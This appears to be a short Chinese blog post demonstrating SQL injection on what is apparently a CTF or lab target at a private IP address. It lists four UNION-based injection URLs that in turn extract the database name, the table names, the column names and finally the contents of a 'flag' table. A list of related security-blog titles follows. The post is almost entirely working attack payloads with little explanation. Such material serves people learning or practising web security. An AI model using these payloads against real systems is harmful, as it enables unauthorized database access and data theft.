网络安全sql注入实战演示

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---库名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---表名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---列名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---值

相关推荐
还是奇怪8 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
终焉暴龙王1 天前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川1 天前
Apache文件解析漏洞
web安全·apache
希望奇迹很安静2 天前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南2 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
北极光SD-WAN组网2 天前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水2 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
未来之窗软件服务3 天前
网站访问信息追踪系统在安全与性能优化中的关键作用——网络安全—仙盟创梦IDE
安全·web安全·性能优化·仙盟创梦ide·东方仙盟
介一安全3 天前
【Web安全】逻辑漏洞之URL跳转漏洞:原理、场景与防御
安全·web安全·安全威胁分析·安全性测试·逻辑漏洞·url跳转
希望奇迹很安静3 天前
文件包含学习总结
安全·web安全·渗透测试学习